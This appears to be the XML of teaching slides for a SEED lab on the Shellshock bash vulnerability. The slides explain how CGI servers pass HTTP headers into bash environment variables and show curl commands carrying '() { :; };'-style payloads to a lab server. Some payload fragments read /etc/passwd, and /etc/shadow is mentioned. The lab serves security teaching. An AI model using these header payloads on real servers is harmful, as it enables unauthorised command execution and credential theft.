                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2537F1A-C471-4AD9-E2F3-5B6A45303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524000"/>
            <a:ext cx="4758816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910A3F0-69C4-2496-395E-4526DF804037}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="607067" y="4800600"/>
            <a:ext cx="10081253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The most important part</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>: a web server will translate HTTP request header fields into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577574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8890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Send an HTTP Request to the victim server that contains our shellshock payload in the HTTP Header fields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360" y="2809360"/>
                <a:ext cx="190296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4080" y="2965960"/>
                <a:ext cx="1707120" cy="74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5610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FDE68124-C627-C95E-3074-E130FDB489DB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C348365-83DA-198C-217E-3F9D293B3299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C348365-83DA-198C-217E-3F9D293B32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72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04E0D35-8795-D99E-B838-6EDD07885993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04E0D35-8795-D99E-B838-6EDD078859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0" y="4799800"/>
                <a:ext cx="68724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9223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  <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The new bash process begins to parse our HTTP header fields for environment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>varaibles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FE9B75-BD69-A5DE-1614-6DF901C3ADA9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72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0" y="4799800"/>
                <a:ext cx="687240" cy="2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5466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8B750C-16DB-B67F-64D0-A30CF241FE59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="152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Gameplan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61FCDD-7A0E-8A87-EF41-478EA3E1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806524"/>
            <a:ext cx="1003380" cy="16523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FD8D6D-4E3E-B884-6476-42C2D0960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3571240"/>
            <a:ext cx="1512839" cy="18047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D7142-2383-A963-C5EA-F6219D57BF71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="760227"/>
            <a:ext cx="6705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Send an HTTP Request to the victim server that contains our shellshock payload in the HTTP Header fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The web server will fork() and create a bash shell that will handle our request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The new bash process begins to parse our HTTP header fields for environment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>varaibles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F001DC-A079-CEB4-4F0F-BC40A1ABBCAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3512201" y="2728156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3FDD97-279C-9C22-9D49-48AF17803D04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3505200" y="3124200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7CEEA5-CCF9-3687-5531-274E4658EE15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3493305" y="3496605"/>
            <a:ext cx="2171092" cy="3960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E0AF5-4E86-E8F0-53E0-9062499DD409}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474907" y="2704036"/>
            <a:ext cx="2194383" cy="11923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he Evil Patrick Meme Is the Newest 'SpongeBob' Meme">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{067FDDA7-5B0D-394F-4F7C-7A8FE6D2D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014518"/>
            <a:ext cx="557518" cy="556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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1305000" y="2845360"/>
              <a:ext cx="1831320" cy="10105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B46D7FB-1BBE-B347-736D-8B8C98F90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9000" y="2809373"/>
                <a:ext cx="1902960" cy="10821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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6039720" y="3001960"/>
              <a:ext cx="1635480" cy="6706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E67CDE4-3E04-19F3-2F81-2B5120BF9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03720" y="2965979"/>
                <a:ext cx="1707120" cy="742282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1FE9B75-BD69-A5DE-1614-6DF901C3ADA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9996007" y="3398145"/>
            <a:ext cx="1468264" cy="22839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CGI Application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(bash)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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="9072360" y="4238200"/>
              <a:ext cx="681480" cy="2167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B5BAAF-1F99-F311-79C8-B42D8629B4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63360" y="4229200"/>
                <a:ext cx="6991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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="9033120" y="4808440"/>
              <a:ext cx="669600" cy="256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EB359FB-971B-1F16-B42D-ADCDC7F18B0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024125" y="4799440"/>
                <a:ext cx="687231" cy="274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83DA7796-82FE-8F29-BF37-66C910EA5780}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8370505" y="1843764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SHELLSHOCK!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9834CA-70C3-F2B6-822C-2EF6D3A90685}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7583112" y="2138222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server will run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>our</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr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235266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059579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7888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do we send HTTP requests?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7A1C74-5B69-8217-B2E3-6AB2535AD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295400"/>
            <a:ext cx="9067800" cy="170634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12110EA-DAE7-F6A5-C058-A8D278255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505200"/>
            <a:ext cx="5548313" cy="24105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22D22E5-57B3-3857-797D-BDA3A29828CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="4038600"/>
            <a:ext cx="474486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getenv.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> is a script we can hit that will print out the CGI process’s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223433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2C6B-3D9B-48BD-E852-2E0582361BBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1295400"/>
            <a:ext cx="103412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-A “my data” –v www.seedlab-shellshock.com/cgi-bin/getenv.cgi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39AB-B2E0-3033-68DF-289E4ECE77D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="1905000"/>
            <a:ext cx="715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dirty="0"/>
              <a:t>can be used to set specific fields in the HTTP request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93DF2-51AC-CA5E-C99E-2084C670B7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031"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3429000"/>
            <a:ext cx="12192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AB520-8005-8ACD-7E83-E723AA8BCA1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="152400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curl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942C6B-3D9B-48BD-E852-2E0582361BBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1295400"/>
            <a:ext cx="10341293" cy="4001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-A “my data” –v www.seedlab-shellshock.com/cgi-bin/getenv.cgi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A639AB-B2E0-3033-68DF-289E4ECE77D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="1905000"/>
            <a:ext cx="7157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en-US" dirty="0"/>
              <a:t>can be used to set specific fields in the HTTP request header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93DF2-51AC-CA5E-C99E-2084C670B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124200"/>
            <a:ext cx="12192000" cy="15271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FB2E0E-5FE1-C708-16B9-5F869A5C7AE3}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5303160" y="3316960"/>
              <a:ext cx="1559520" cy="61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FB2E0E-5FE1-C708-16B9-5F869A5C7AE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4520" y="3308320"/>
                <a:ext cx="1577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99CF36-03A9-2F3C-C970-8CA5E862CF75}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1859040" y="3971440"/>
              <a:ext cx="1492920" cy="32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99CF36-03A9-2F3C-C970-8CA5E862CF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040" y="3962800"/>
                <a:ext cx="1510560" cy="4968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86583B7-8721-751C-6214-59A8033167FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532143" y="5225344"/>
            <a:ext cx="10943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information that we passed with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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>flag eventually got converted into an environment variable!!!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19068470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C0465-A1F6-402E-7F59-C90643DC252B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2209800"/>
            <a:ext cx="110337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This server is running a vulnerable version of bash</a:t>
            </a:r>
          </a:p>
          <a:p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This server gets untrusted user input for environment variables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721898" y="45720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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38095937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45657" y="2362200"/>
            <a:ext cx="1205490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               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DE5342-2212-B4E4-32AB-C3D314B52E60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2667000" y="2331422"/>
            <a:ext cx="843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598496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533400" y="2286000"/>
            <a:ext cx="1138164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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"() { ??? };    " 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67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381000" y="2133600"/>
            <a:ext cx="112453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 ‘this server is sus’; “   [URL]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DA0FC-AD31-3E08-B6F3-8122C5EDF567}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="3810000"/>
            <a:ext cx="7994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170EC1-488F-4C55-E318-DCCBFB1832CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3099637" y="1575638"/>
            <a:ext cx="353924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247F9-71FA-908A-F079-0B8B01724155}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2207993" y="297180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Shell function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C8C4576-1A92-D6A4-3734-FC1E6FC9C72B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7290638" y="204039"/>
            <a:ext cx="277723" cy="510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367EE-BB2F-5AE6-F62D-D8B4071ABACE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5410200" y="29288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command to be executed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82996-81C0-0E3E-CC5A-0A8F2061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043"/>
            <a:ext cx="12192000" cy="8464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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5806080" y="4703320"/>
              <a:ext cx="2026800" cy="3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1760" y="4699000"/>
                <a:ext cx="2035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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1482480" y="4726360"/>
              <a:ext cx="295560" cy="79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160" y="4722040"/>
                <a:ext cx="304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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5186160" y="4744000"/>
              <a:ext cx="498600" cy="1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520" y="4726360"/>
                <a:ext cx="53424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3B68E-1720-3067-5A93-B7B3AC0C3DB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5118120" y="5755240"/>
            <a:ext cx="279360" cy="276120"/>
            <a:chOff x="5118120" y="5755240"/>
            <a:chExt cx="2793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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5160960" y="5755240"/>
                <a:ext cx="221040" cy="25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2960" y="5737240"/>
                  <a:ext cx="2566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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5118120" y="5765680"/>
                <a:ext cx="225720" cy="26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0480" y="5747680"/>
                  <a:ext cx="261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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5191920" y="5755240"/>
                <a:ext cx="45720" cy="21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920" y="5737240"/>
                  <a:ext cx="81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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5150880" y="5877280"/>
                <a:ext cx="24660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880" y="5859640"/>
                  <a:ext cx="2822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C5961A3-8DAA-C120-10CB-CCA91A4A32CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400" y="5732273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must add another echo statement beforehand (??)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="729777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C238D-C2DB-01EF-B0D8-017DF3319171}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="838200"/>
            <a:ext cx="10096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first try to get the server to print out some basic message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CFAE8-4D74-6FEA-2F10-E40F140285EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="2133600"/>
            <a:ext cx="1124538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 ‘this server is sus’; “   [URL]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DA0FC-AD31-3E08-B6F3-8122C5EDF567}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="3810000"/>
            <a:ext cx="79944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7170EC1-488F-4C55-E318-DCCBFB1832CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3099637" y="1575638"/>
            <a:ext cx="353924" cy="2438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247F9-71FA-908A-F079-0B8B01724155}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2207993" y="2971801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Bogus Shell function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C8C4576-1A92-D6A4-3734-FC1E6FC9C72B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7290638" y="204039"/>
            <a:ext cx="277723" cy="5105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4367EE-BB2F-5AE6-F62D-D8B4071ABACE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5410200" y="2928819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command to be executed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282996-81C0-0E3E-CC5A-0A8F2061B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5043"/>
            <a:ext cx="12192000" cy="8464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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5806080" y="4703320"/>
              <a:ext cx="2026800" cy="313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F07F4CF-F879-B702-ADD8-8D1DB12C383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1760" y="4699000"/>
                <a:ext cx="20354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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1482480" y="4726360"/>
              <a:ext cx="295560" cy="795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E21793-1A6F-3AA6-282C-4B3BB632885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78160" y="4722040"/>
                <a:ext cx="3042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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5186160" y="4744000"/>
              <a:ext cx="498600" cy="10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60D8D16-4A5E-AEE1-E714-20666DFE378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68147" y="4726000"/>
                <a:ext cx="534266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003B68E-1720-3067-5A93-B7B3AC0C3DB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5118120" y="5755240"/>
            <a:ext cx="279360" cy="276120"/>
            <a:chOff x="5118120" y="5755240"/>
            <a:chExt cx="2793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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5160960" y="5755240"/>
                <a:ext cx="221040" cy="259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1BA7956-7F14-79F2-FA6F-3EE375756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42989" y="5737265"/>
                  <a:ext cx="256622" cy="2947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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5118120" y="5765680"/>
                <a:ext cx="225720" cy="26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39837E1-67D5-CC45-F17B-1CE9D2376C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00120" y="5747680"/>
                  <a:ext cx="2613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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5191920" y="5755240"/>
                <a:ext cx="45720" cy="216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AE8312A-AC97-C33A-2DEC-7E60E620199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73920" y="5737270"/>
                  <a:ext cx="81360" cy="251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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5150880" y="5877280"/>
                <a:ext cx="24660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FF8B01A-C36F-97E8-C0DF-759C63B237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32880" y="5859280"/>
                  <a:ext cx="282240" cy="3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C5961A3-8DAA-C120-10CB-CCA91A4A32CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400" y="5732273"/>
            <a:ext cx="622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must add another echo statement beforehand (??)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37619308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CAADD6-B825-FF4B-F213-8E207740F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800225"/>
            <a:ext cx="11563350" cy="3257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1E6392-B6F6-7D9D-3D19-163F2164D68B}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3484995" y="3213025"/>
              <a:ext cx="99000" cy="133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1E6392-B6F6-7D9D-3D19-163F2164D6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75995" y="3204025"/>
                <a:ext cx="11664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0116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9770623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                       [URL]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858C52-032A-87F9-2CAE-A702B2A50616}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6508255" y="1959690"/>
            <a:ext cx="867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0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462675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EED177-45E5-695D-67E3-E73A44A320E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="5943600"/>
            <a:ext cx="828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look for programs when absolute path is not provided?  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/local/bin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5628303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10692351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/bin/cat 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/passwd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E22AA-49EC-A5A5-CE0A-9F5930610DD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="3115828"/>
            <a:ext cx="824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We must provide the absolute path of things such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cat, ls, touch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D2EBF5E-75ED-79D6-6078-B4CCD00C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1000"/>
            <a:ext cx="12192000" cy="8539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96EE2B-6D29-0586-671A-02EFF0C198DF}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4525280" y="4689113"/>
              <a:ext cx="515160" cy="337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96EE2B-6D29-0586-671A-02EFF0C198D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6280" y="4680113"/>
                <a:ext cx="5328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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4474160" y="1058153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65520" y="104915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9309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4343400" y="167640"/>
            <a:ext cx="5197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Print out contents of a file we shouldn’t see?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10508005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/bin/cat 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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4474160" y="1058153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F36E80-D9EB-DAD3-5A47-909893BD85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5160" y="10491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D8BB916-8A18-6FE9-539A-CF8B494EF442}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="3542817"/>
            <a:ext cx="4398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about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/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>??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F72F2C-DF11-FA67-0316-F7A4F1789D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32821"/>
            <a:ext cx="12192000" cy="37106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45C3C65-0651-3585-2D9F-C30E73AB47F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3669920" y="4508393"/>
            <a:ext cx="310320" cy="295200"/>
            <a:chOff x="3669920" y="4508393"/>
            <a:chExt cx="310320" cy="29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932A9A-DA09-5AA8-8C4E-7D390EAC1645}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3669920" y="4508393"/>
                <a:ext cx="310320" cy="276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932A9A-DA09-5AA8-8C4E-7D390EAC16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61280" y="4499393"/>
                  <a:ext cx="3279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7BE86B-71FA-7BFC-1C0B-160F1C25632D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3716360" y="4554833"/>
                <a:ext cx="216360" cy="2487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7BE86B-71FA-7BFC-1C0B-160F1C2563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07360" y="4545833"/>
                  <a:ext cx="234000" cy="266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53BC36F-917E-666B-0642-9567ECA29880}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="601133" y="5234268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one does not work </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> ….. Why?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7594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75CB4-8C86-7F4A-DA61-125369ED20D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3733800" y="22098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other commands could we run??</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25975068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180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EF2CD-EF75-08B3-8C16-7DB4D51E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3406"/>
            <a:ext cx="12192000" cy="391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D226D-4374-402D-3325-41C12518642F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276600" y="368277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work…… or does it?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BECA3-93F5-5042-7B5A-A4E671716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4277842"/>
            <a:ext cx="6496050" cy="194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520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F163C-12F3-DDD1-2B8A-9300A17DA8CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="1524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first shellshock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8E36E-17F4-AFE9-388D-7F7EF9ABE626}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="1370334"/>
